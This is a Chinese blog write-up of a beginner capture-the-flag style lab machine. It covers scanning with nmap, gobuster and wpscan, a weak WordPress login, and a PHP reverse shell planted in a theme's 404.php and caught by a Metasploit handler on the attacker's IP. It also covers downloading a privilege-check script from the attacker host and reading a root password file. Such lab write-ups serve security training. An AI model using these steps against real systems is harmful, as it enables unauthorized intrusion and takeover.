難度:初級
靶機發布日期:2019年11月2日
靶機描述:This is super friendly box intended for Beginner’s
博客中如有任何問題,懇請批評指正,萬分感謝。個人郵箱:[email protected]
工具、知識點和漏洞
- nmap
- gobuster
- wpscan
- metasploit
- msfvenom
網絡配置
靶機導入到virtualbox,需要配置靶機的網絡爲Host Only
,這裏需要確保DHCP之後靶機的IP地址爲192.168.56.103
,不然之後就沒法進行下去了。怎麼確保靶機的IP爲192.168.56.103
?最初我得到的IP是192.168.56.105
,因爲virtualbox上還有其他的靶機,所以想着可能某個靶機把192.168.56.103
這個IP給佔用了,所以我就把virtualbox上所有的靶機都刪除了,之後重新導入了這個靶機,得到的IP就是192.168.56.103
。你要是問我知不知道其他的方法,答案是我也想知道……
最開始我踩的坑是:把靶機的網絡配置成橋接模式了,然後就遇到了下圖中顯示的問題。明明靶機的IP是192.168.0.107
,結果卻向192.168.56.103
發起了請求,直接就玩不下去了呀。以至於一度懷疑是自己太菜。
這個靶機的網絡配置可以參考我昨天寫的文章:Ubuntu下virtualbox(Host only)和VMware共用同一虛擬網卡
0x00、信息收集
靶機IP:192.168.56.103
端口和服務
nmap -sS -sV -T5 -A -p- 192.168.56.103
頁面、目錄枚舉
gobuster dir -u http://192.168.56.103 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.txt,.html,.zip
查看評論時發現了一些信息,提示我們這個網站存在弱口令
wpscan掃描了一下,檢測到版本是5.2.3,有一個用戶c0rrupt3d_brain
得到一組用戶名密碼:c0rrupt3d_brain:24992499
0x01、getshell
登錄後臺http://192.168.56.103/wordpress/wp-login.php
發現當前用戶擁有主題Twenty Nineteen
的404.php
頁面修改權限,隨後將反彈shell的php代碼寫入該文件。我這裏是使用msfvenom
生成的代碼。
此處刪去生成代碼的命令~望諒解
msfconsole接收反彈的shell
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.56.104
set lport 1234
run
訪問404.php
觸發反彈shell的代碼
獲取shell之後的第一步使用Python獲取一個tty
python -c 'import pty; pty.spawn("/bin/bash")'
0x02、提權
--------------------------------------------------------------Begin 套話分割線 Begin--------------------------------------------------------------
關於Linux提權,可以直接用腳本蒐集一下對於提權有用的信息,比如用linuxprivchecker.py、LinEnum.sh.
如果你想熟悉一下沒有腳本的情況下怎麼收集這些信息可以參考privilege_escalation_-_linux
先在kali上開啓HTTP服務
python -m SimpleHTTPServer 65534
使用wget下載linuxprivchecker.py腳本到靶機的tmp目錄
因爲本人所在的地理位置不允許直接訪問Github,所以我是從自己的kali下載的
cd /tmp
wget http://192.168.0.108:65534/Desktop/linuxprivchecker.py
爲了便於查看收集到的信息,我將結果輸出到report.txt文本中,之後使用less查看
python linuxprivchecker.py > report.txt
less report.txt
靶機做了這些後發現還是手動收集更快……,手動收集不到有效信息的情況下再嘗試用腳本。
-------------------------------------------------------------- End 套話分割線 End --------------------------------------------------------------
之後在/var/www/html
目錄下“掃蕩”了一下,發現了數據庫的用戶名和密碼。又去/home
看了一下發現有個隱藏文件.root_password_ssh.txt
,從文件名稱來看裏面應該是root
用戶的密碼。最開始通過ssh登錄,結果失敗了。可能是配置了不允許root用戶遠程登錄。隨後su root
切換到root用戶。
額~這個靶機本身沒什麼難度,容易卡住的地方可能也就是需要先配置好靶機的網絡吧~
PS:以後的文章可能更加偏重於思路的分享,可能不再像以前一樣寫的那麼細節,但這不代表以後都不用心了,只能說順應大趨勢吧,該提到的點也都會提到。有什麼問題可以私下交流,感謝!!!